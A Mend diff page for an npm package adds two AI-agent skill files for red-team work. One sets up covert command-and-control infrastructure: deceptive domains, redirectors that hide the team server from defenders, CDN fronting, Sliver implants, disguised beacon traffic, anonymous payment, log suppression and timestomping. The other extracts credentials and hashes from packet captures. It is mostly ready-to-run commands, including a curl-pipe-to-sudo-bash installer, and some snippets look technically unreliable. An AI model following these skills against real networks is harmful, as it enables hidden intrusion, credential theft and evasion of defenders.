npm - rtexit-method - Versions diffs - 0.1.5 → 0.1.6 - Mend

rtexit-method 0.1.5 → 0.1.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (7) hide show

package/packaged-assets/.agents/skills/rt-redteam-infra/SKILL.md ADDED Viewed

@@ -0,0 +1,333 @@
+---
+name: rt-redteam-infra
+description: "Red team infrastructure setup and operational security skill. C2 server hardening, Apache/Nginx redirectors, domain fronting via CDN (Cloudflare, Azure CDN), malleable C2 profiles for Sliver/Cobalt Strike, categorized domain acquisition, SSL certificates for C2, team server setup, redirector chaining, and operator OPSEC. Use at the start of every engagement to build resilient, attribution-resistant infrastructure."
+---
+# rt-redteam-infra — Red Team Infrastructure & OpSec
+## Overview
+Professional red team infrastructure separates the operator from the target. If blue team blocks your C2 IP, redirectors absorb the hit while the team server stays hidden. Domain fronting makes C2 traffic look like legitimate CDN traffic. Good infrastructure = longer dwell time, realistic APT simulation.
+**Infrastructure layers:**
+```
+Operator → Team Server (hidden) → Redirector(s) → Target
+                                ↕
+                          CDN / Domain Front
+```
+---
+## Phase 1 — Domain Acquisition & Categorization
+```bash
+# Buy domains that look legitimate and are pre-categorized
+# Categorized domains bypass web proxies that block "Uncategorized" traffic
+# Check domain categorization
+curl "https://sitereview.bluecoat.com/v/sitereview.jsp?url=TARGET_DOMAIN"
+# Or: Fortinet, McAfee, Palo Alto URL categorization checkers
+# Good categories for C2: Technology, Business, CDN, Cloud Services
+# Bad categories: Newly Registered, Malware, Suspicious
+# Aged domains (registered 1+ years ago) = more trusted
+# Tool: expireddomains.net — find expired domains with good reputation
+# Domain naming patterns for believability:
+# cdn-assets-[company].com
+# updates-[software].com
+# telemetry-[product].net
+# api-gateway-[company].io
+# [company]-cloud-services.com
+# Check domain history before buying
+curl "https://web.archive.org/web/*/DOMAIN"
+# Avoid: domains previously used for spam/malware
+```
+---
+## Phase 2 — VPS / Cloud Infrastructure Setup
+```bash
+# Use separate providers for team server and redirectors
+# Team server: Hetzner, OVH, DigitalOcean (EU providers harder to subpoena quickly)
+# Redirectors: AWS, Azure, GCP (looks like legitimate cloud traffic)
+# NEVER use your real identity for red team infra
+# Pay with crypto or gift cards for anonymity in authorized tests
+# Basic VPS hardening (team server)
+# Change SSH port
+sed -i 's/#Port 22/Port 2222/' /etc/ssh/sshd_config
+systemctl restart sshd
+# Restrict access to team only
+ufw default deny incoming
+ufw allow from OPERATOR_IP to any port 2222  # SSH — operators only
+ufw allow from REDIRECTOR_IP to any port 50050  # Cobalt Strike / Sliver
+ufw allow 80,443/tcp  # For letsencrypt
+ufw enable
+# No logging of operator IPs
+sed -i 's/^LogLevel.*/LogLevel QUIET/' /etc/ssh/sshd_config
+# Firewall: only redirectors can reach team server
+# Targets should NEVER see team server IP directly
+iptables -A INPUT -s REDIRECTOR_IP -p tcp --dport 50050 -j ACCEPT
+iptables -A INPUT -p tcp --dport 50050 -j DROP
+```
+---
+## Phase 3 — Apache/Nginx Redirector Setup
+```bash
+# Redirector sits between target and team server
+# Blue team sees redirector IP — team server IP stays hidden
+# Redirector checks URI/headers → forwards legit C2 traffic → blocks scanners/defenders
+# Install Apache
+apt install apache2 -y
+a2enmod proxy proxy_http rewrite ssl headers
+# /etc/apache2/sites-available/redirector.conf
+cat > /etc/apache2/sites-available/redirector.conf << 'EOF'
+<VirtualHost *:443>
+    ServerName cdn-assets-corp.com
+    SSLEngine on
+    SSLCertificateFile    /etc/letsencrypt/live/cdn-assets-corp.com/fullchain.pem
+    SSLCertificateKeyFile /etc/letsencrypt/live/cdn-assets-corp.com/privkey.pem
+    # Only forward requests matching C2 URI pattern
+    # Everything else → redirect to innocent site (avoids detection)
+    RewriteEngine On
+    RewriteCond %{REQUEST_URI} ^/updates/client/[a-f0-9]{32}$  [NC]
+    RewriteRule ^(.*)$ https://TEAM_SERVER_IP:443$1 [P,L]
+    # All other traffic → redirect to Microsoft (looks like CDN)
+    RewriteRule ^(.*)$ https://www.microsoft.com/ [R=302,L]
+    # Block scanners
+    RewriteCond %{HTTP_USER_AGENT} (curl|python|nmap|masscan|zgrab) [NC]
+    RewriteRule .* - [F]
+    ProxyPassReverse / https://TEAM_SERVER_IP:443/
+    SSLProxyEngine On
+    SSLProxyVerify none
+</VirtualHost>
+EOF
+a2ensite redirector.conf && systemctl reload apache2
+# Get SSL cert (Let's Encrypt)
+certbot --apache -d cdn-assets-corp.com
+```
+---
+## Phase 4 — Domain Fronting via CDN
+```bash
+# Domain fronting: use CDN to hide true destination
+# HTTP Host header = your C2 domain
+# SNI/TLS = legitimate CDN domain (e.g., allowed-corp.cloudfront.net)
+# CDN routes based on Host header → reaches your C2
+# Cloudflare Workers domain fronting
+# 1. Put your C2 domain behind Cloudflare (DNS proxied)
+# 2. Configure Worker to route to team server
+# worker.js:
+cat > worker.js << 'EOF'
+addEventListener('fetch', event => {
+  event.respondWith(handleRequest(event.request))
+})
+async function handleRequest(request) {
+  const url = new URL(request.url)
+  // Forward to team server
+  const newUrl = `https://TEAM_SERVER_IP${url.pathname}${url.search}`
+  return fetch(newUrl, {
+    method: request.method,
+    headers: request.headers,
+    body: request.body
+  })
+}
+EOF
+# Deploy via wrangler CLI
+# Azure CDN fronting
+# Create Azure CDN endpoint → origin = team server
+# Custom domain = your C2 domain
+# Traffic appears to come from *.azureedge.net
+# Test domain fronting
+curl -H "Host: YOUR_C2_DOMAIN" https://ALLOWED_CDN_DOMAIN/c2-check
+```
+---
+## Phase 5 — Sliver C2 with Redirectors
+```bash
+# Sliver team server setup (open source C2)
+curl https://sliver.sh/install | sudo bash
+# Start Sliver server
+sudo systemctl start sliver
+# Connect operator
+sliver-client
+# Generate implant pointing to redirector (NOT team server)
+generate --http https://cdn-assets-corp.com --os windows --arch amd64 \
+  --name implant --save /tmp/
+# Create HTTP listener on team server
+https -l 443 -d cdn-assets-corp.com
+# Multiplayer (team) — add operators
+new-operator --name operator1 --lhost TEAM_SERVER_IP
+# Generates operator1.cfg → share with team member
+# Implant traffic flow:
+# Target → https://cdn-assets-corp.com (redirector) → TEAM_SERVER_IP:443 (sliver)
+```
+---
+## Phase 6 — Malleable C2 Profiles
+```bash
+# Malleable profiles customize how C2 traffic looks
+# Goal: make beacon traffic look like legitimate application traffic
+# Sliver custom traffic profile (traffic looks like Google Analytics)
+# Edit ~/.sliver/configs/http-c2.yaml
+# Custom URI patterns
+uris:
+  - /collect
+  - /analytics.js
+  - /gtag/js
+  - /ga.js
+# Custom headers (mimics Google Analytics)
+headers:
+  - "Cache-Control: no-cache"
+  - "Accept: text/html,application/xhtml+xml"
+  - "Accept-Language: en-US,en;q=0.9"
+# Cobalt Strike malleable profile example (if available)
+# https://github.com/rsmudge/Malleable-C2-Profiles
+# Amazon profile (traffic looks like AWS API calls)
+set useragent "aws-sdk-java/1.12.261";
+http-get {
+    set uri "/v1/metadata/";
+    client { header "x-amz-date" "..."; }
+}
+# Test profile detection
+# c2lint profile.profile  # CS built-in validator
+# Or: pipe implant traffic through Wireshark → verify looks like claimed app
+```
+---
+## Phase 7 — Operator OPSEC
+```bash
+# Never connect directly to targets from your real IP
+# Chain: Operator → VPN → Jump box → Target
+# VPN for operators
+# WireGuard setup on jump box
+apt install wireguard -y
+wg genkey | tee /etc/wireguard/private.key | wg pubkey > /etc/wireguard/public.key
+# /etc/wireguard/wg0.conf (server)
+[Interface]
+Address = 10.8.0.1/24
+ListenPort = 51820
+PrivateKey = SERVER_PRIVATE_KEY
+PostUp = iptables -A FORWARD -i wg0 -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
+PostDown = iptables -D FORWARD -i wg0 -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE
+[Peer]
+# Operator 1
+PublicKey = OPERATOR1_PUBLIC_KEY
+AllowedIPs = 10.8.0.2/32
+wg-quick up wg0
+# OPSEC checklist per engagement:
+# ✅ All traffic through VPN → jump box → target
+# ✅ No direct connections team server ↔ target
+# ✅ Redirectors in place before first beacon
+# ✅ Domain categorized before use
+# ✅ Unique implant per target (no cross-engagement reuse)
+# ✅ Malleable profile matching engagement's allowed traffic
+# ✅ Timestomp all dropped files
+# ✅ Clear logs after engagement (with client approval)
+# ✅ Screenshot all actions for evidence
+# Deconfliction — register your IPs with SOC
+# "Safe listing" — tell blue team your op IPs to avoid friendly fire
+# Deconfliction email: "Our red team IPs: X.X.X.X — please whitelist"
+```
+---
+## Phase 8 — Infrastructure Teardown
+```bash
+# After engagement ends — destroy all infrastructure
+# Remove implants
+# In Sliver: session → kill → all
+sessions
+kill --all
+# Destroy VPS instances
+# AWS: aws ec2 terminate-instances --instance-ids i-XXXXX
+# DigitalOcean: doctl compute droplet delete DROPLET_ID
+# Revoke certificates
+certbot revoke --cert-path /etc/letsencrypt/live/DOMAIN/cert.pem
+# Remove DNS records
+# Delete all A records pointing to red team infrastructure
+# Burn domains (don't reuse across engagements)
+# Each engagement = fresh domains
+# Final checklist:
+# ✅ All beacons killed
+# ✅ Persistence removed from targets
+# ✅ VPS destroyed
+# ✅ Domains released/burned
+# ✅ Operator VPN config revoked
+# ✅ Evidence logs delivered to client
+```
+---
+## Skill Levels
+**BEGINNER:** Single VPS + direct C2 connection (no redirectors) — acceptable for simple engagements
+**INTERMEDIATE:** Nginx redirector + categorized domain + Let's Encrypt cert + WireGuard VPN for operators
+**ADVANCED:** Apache malleable redirector + domain fronting via CDN + Sliver with custom HTTP profile
+**EXPERT:** Multi-hop redirector chains + multiple CDN providers + custom malleable profiles + full deconfliction workflow
+---
+## References
+- Sliver C2: https://github.com/BishopFox/sliver
+- Malleable C2 Profiles: https://github.com/rsmudge/Malleable-C2-Profiles
+- RedTeam Infrastructure Wiki: https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
+- MITRE ATT&CK T1090: https://attack.mitre.org/techniques/T1090/

package/packaged-assets/.agents/skills/rt-traffic-analysis/SKILL.md ADDED Viewed

@@ -0,0 +1,283 @@
+---
+name: rt-traffic-analysis
+description: "Network traffic capture and analysis skill for authorized engagements. Wireshark capture filters and display filters, tcpdump workflows, credential extraction from pcap files, protocol identification, C2 traffic analysis, TLS fingerprinting (JA3/JA3S), detecting lateral movement in packet captures, and automated pcap analysis with NetworkMiner and Zeek. Use when analyzing captured network traffic, verifying C2 traffic profile, or investigating network-level evidence."
+---
+# rt-traffic-analysis — Network Traffic Capture & Analysis
+## Overview
+Traffic analysis in red teaming serves two purposes: finding credentials and sensitive data in captured traffic, and verifying that your own C2 traffic blends in and avoids detection signatures.
+---
+## Phase 1 — Capture Setup
+```bash
+# tcpdump — command line capture
+# Capture all traffic on interface
+tcpdump -i eth0 -w capture.pcap
+# Capture specific host
+tcpdump -i eth0 host 10.10.10.50 -w target.pcap
+# Capture specific port range
+tcpdump -i eth0 'port 80 or port 443 or port 8080' -w web.pcap
+# Capture credentials (unencrypted protocols)
+tcpdump -i eth0 'port 21 or port 23 or port 110 or port 143 or port 25' -w cleartext.pcap
+# 21=FTP, 23=Telnet, 110=POP3, 143=IMAP, 25=SMTP
+# Capture from remote host (pipe over SSH)
+ssh user@PIVOT_HOST "tcpdump -i eth0 -w - 'not port 22'" | wireshark -k -i -
+# Promiscuous mode (capture all traffic on segment)
+tcpdump -i eth0 -p  # -p = don't use promiscuous (default on)
+ip link set eth0 promisc on  # Enable promiscuous
+```
+---
+## Phase 2 — Wireshark Filters
+```bash
+# Credential extraction filters
+# HTTP POST requests (login forms)
+http.request.method == "POST"
+# HTTP basic auth
+http.authorization
+# FTP credentials
+ftp.request.command == "PASS" or ftp.request.command == "USER"
+# Telnet (capture stream)
+telnet
+# SMTP auth
+smtp.auth
+# NTLM authentication (all protocols)
+ntlmssp
+# Kerberos
+kerberos
+# DNS queries (C2 detection / data exfiltration detection)
+dns
+# Long DNS queries (possible DNS tunneling)
+dns.qry.name.len > 50
+# SMB file access
+smb2.cmd == 5  # SMB2 Read
+# Key display filters
+ip.addr == 10.10.10.50                    # Traffic to/from specific host
+ip.src == 10.10.10.0/24                   # From subnet
+tcp.port == 4444                          # Specific port (C2 detection)
+frame.len > 1400                          # Large packets
+tcp.flags.syn == 1 && tcp.flags.ack == 0  # SYN scan detection
+http.response.code == 200                 # Successful HTTP responses
+ssl.handshake.type == 1                   # TLS Client Hello
+```
+---
+## Phase 3 — Automated Credential Extraction
+```bash
+# NetworkMiner — GUI tool, auto-extracts credentials from pcap
+# https://www.netresec.com/?page=NetworkMiner
+mono NetworkMiner.exe capture.pcap
+# Credentials tab → all extracted usernames/passwords
+# PCredz — automated credential extraction
+git clone https://github.com/lgandx/PCredz
+python3 PCredz.py -f capture.pcap
+# Extracts: HTTP Basic, FTP, Telnet, POP3, IMAP, SNMP community strings, NTLMv1/v2
+# Dsniff tools
+dsniff -p capture.pcap       # Extract passwords from pcap
+urlsnarf -p capture.pcap     # Extract URLs
+msgsnarf -p capture.pcap     # IM/chat messages
+mailsnarf -p capture.pcap    # Email contents
+# Extract HTTP credentials with tshark
+tshark -r capture.pcap -Y "http.request.method==POST" \
+  -T fields -e http.host -e http.request.uri -e urlencoded-form.value
+# Extract all HTTP request bodies
+tshark -r capture.pcap -Y "http" -T fields \
+  -e ip.src -e ip.dst -e http.request.method \
+  -e http.request.uri -e http.file_data
+# NTLM hash extraction
+tshark -r capture.pcap -Y "ntlmssp.auth" -T fields \
+  -e ntlmssp.auth.username -e ntlmssp.auth.domain \
+  -e ntlmssp.ntlmserverchallenge -e ntlmssp.auth.ntresponse
+```
+---
+## Phase 4 — TLS Fingerprinting (JA3/JA3S)
+```bash
+# JA3 fingerprints identify TLS clients (browsers, malware, tools)
+# JA3S fingerprints identify TLS servers
+# Use to: verify your C2 traffic, detect blue team tools, identify malware
+# Install ja3
+pip3 install pyja3
+python3 << 'EOF'
+import pyshark
+cap = pyshark.FileCapture('capture.pcap', display_filter='ssl.handshake.type==1')
+for pkt in cap:
+    try:
+        ja3 = pkt.ssl.handshake_type
+        print(f"Src: {pkt.ip.src} → JA3: {pkt.ssl.ja3}")
+    except: pass
+EOF
+# Compare against known JA3 databases
+# https://ja3er.com/
+# Cobalt Strike default JA3: 72a7c4f3d7c7cdbf3f8b1c1e9dbf3c1f (well-known, blocked)
+# → Use malleable profile to change JA3
+# tshark JA3 extraction
+tshark -r capture.pcap -Y "tls.handshake.type==1" \
+  -T fields -e ip.src -e tls.handshake.ja3
+```
+---
+## Phase 5 — C2 Traffic Verification
+```bash
+# Before engagement: verify your own C2 traffic blends in
+# Capture your beacon traffic → analyze for detection signatures
+# Check beacon interval regularity (beacons are too regular = detectable)
+python3 << 'EOF'
+from scapy.all import rdpcap, IP
+import statistics
+pkts = rdpcap("c2_traffic.pcap")
+times = [p.time for p in pkts if IP in p and p[IP].dst == "C2_IP"]
+intervals = [times[i+1]-times[i] for i in range(len(times)-1)]
+print(f"Mean interval: {statistics.mean(intervals):.2f}s")
+print(f"Std deviation: {statistics.stdev(intervals):.2f}s")
+# Low stdev = too regular → increase jitter in C2 profile
+EOF
+# Check packet sizes (uniform sizes = suspicious)
+tshark -r c2_traffic.pcap -T fields -e frame.len | sort | uniq -c | sort -rn | head -10
+# All same size = suspicious → add padding in malleable profile
+# Check DNS query frequency
+tshark -r c2_traffic.pcap -Y dns -T fields -e dns.qry.name | \
+  awk '{print $1}' | sort | uniq -c | sort -rn | head -20
+# Unusual subdomains or high frequency = DNS C2 signature
+```
+---
+## Phase 6 — Zeek (Bro) Analysis
+```bash
+# Zeek generates structured logs from pcap — easier to query than raw pcap
+apt install zeek -y
+# Analyze pcap
+zeek -r capture.pcap
+ls *.log
+# conn.log = all connections
+# http.log = HTTP requests
+# dns.log = DNS queries
+# ssl.log = TLS connections
+# files.log = transferred files
+# weird.log = protocol anomalies
+# Find C2 beacons (regular connections)
+cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p duration | \
+  awk '$4 < 1' | sort | uniq -c | sort -rn | head -20
+# Regular short connections to same host = beacon pattern
+# DNS tunneling detection
+cat dns.log | zeek-cut query | awk '{print length($1), $1}' | \
+  sort -rn | head -20 | awk '$1 > 50'
+# Long DNS queries = tunneling
+# Data exfiltration detection
+cat conn.log | zeek-cut id.orig_h id.resp_h orig_bytes | \
+  sort -k3 -rn | head -10
+# Large outbound transfers
+# HTTP user-agent analysis
+cat http.log | zeek-cut user_agent | sort | uniq -c | sort -rn
+# Unusual user agents = custom tools
+```
+---
+## Phase 7 — Protocol Identification
+```bash
+# Identify unknown protocols in captures
+# Wireshark: Analyze → Decode As → try different protocols
+# tshark protocol summary
+tshark -r capture.pcap -q -z io,phs
+# Shows protocol hierarchy
+# Find non-standard ports with known protocols
+tshark -r capture.pcap -q -z conv,tcp | head -20
+# Port 4444, 8888 etc = likely C2
+# ngrep — grep through packet payloads
+ngrep -q -I capture.pcap "password|secret|token" tcp
+# strings on pcap
+strings capture.pcap | grep -iE "password|api_key|secret|token|Authorization"
+# Identify binary protocols by magic bytes
+python3 << 'EOF'
+from scapy.all import rdpcap, Raw
+pkts = rdpcap("capture.pcap")
+for pkt in pkts:
+    if Raw in pkt:
+        payload = bytes(pkt[Raw])
+        if payload[:2] == b'\x4d\x5a':
+            print("PE executable in traffic!")
+        elif payload[:4] == b'\x50\x4b\x03\x04':
+            print("ZIP file in traffic!")
+        elif b'JFIF' in payload[:20] or b'\xff\xd8\xff' == payload[:3]:
+            print("JPEG in traffic!")
+EOF
+```
+---
+## Skill Levels
+**BEGINNER:** tcpdump capture + Wireshark display filters for credentials · PCredz automated extraction
+**INTERMEDIATE:** JA3 fingerprinting + C2 traffic profiling · Zeek analysis + DNS tunneling detection
+**ADVANCED:** Custom Zeek scripts for behavioral analysis · Beacon interval analysis + jitter verification
+**EXPERT:** ML-based traffic classification · Custom protocol dissectors · Full traffic replay and modification
+---
+## References
+- Wireshark display filters: https://wiki.wireshark.org/DisplayFilters
+- PCredz: https://github.com/lgandx/PCredz
+- Zeek: https://zeek.org
+- JA3: https://github.com/salesforce/ja3
+- MITRE T1040: https://attack.mitre.org/techniques/T1040/